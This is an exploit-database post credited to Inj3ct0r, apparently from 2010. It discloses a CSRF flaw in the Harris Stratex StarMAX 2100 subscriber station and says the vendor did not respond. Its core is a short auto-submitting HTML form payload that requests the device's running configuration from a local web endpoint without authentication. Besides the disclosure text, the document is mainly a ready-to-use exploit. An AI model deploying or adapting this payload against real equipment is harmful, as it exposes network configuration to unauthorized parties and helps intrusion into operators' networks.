Home / os / winme

harrisstratexstarmax-xsrf.txt

Posted on 23 March 2010

===================================================================== Harris Stratex StarMAX subscriber station running config CSRF exploit ===================================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com I found CSRF vulnerability in Harris Stratex 2100 subscriber station. Using this code i am able to view the current configuration of the subscriber station without authentication from both LAN & WAN Product :StarMAX 2100 subscriber station Affected Application Version: 3.0.4.1.7.C Vendor submission:07-04-2009 Vendor Response:No Vulnerability:Able to view the running configuration without authentication from both LAN & WAN <html> <body> <body xonload="config.submit();"> <form name=config method="get" action="http:192.168.1.1/frameCmd6.html"> <input type=hidden name=showRunConfig value="Current Configuration"> </form> </body> </html> # Inj3ct0r.com [2010-03-23]

 

TOP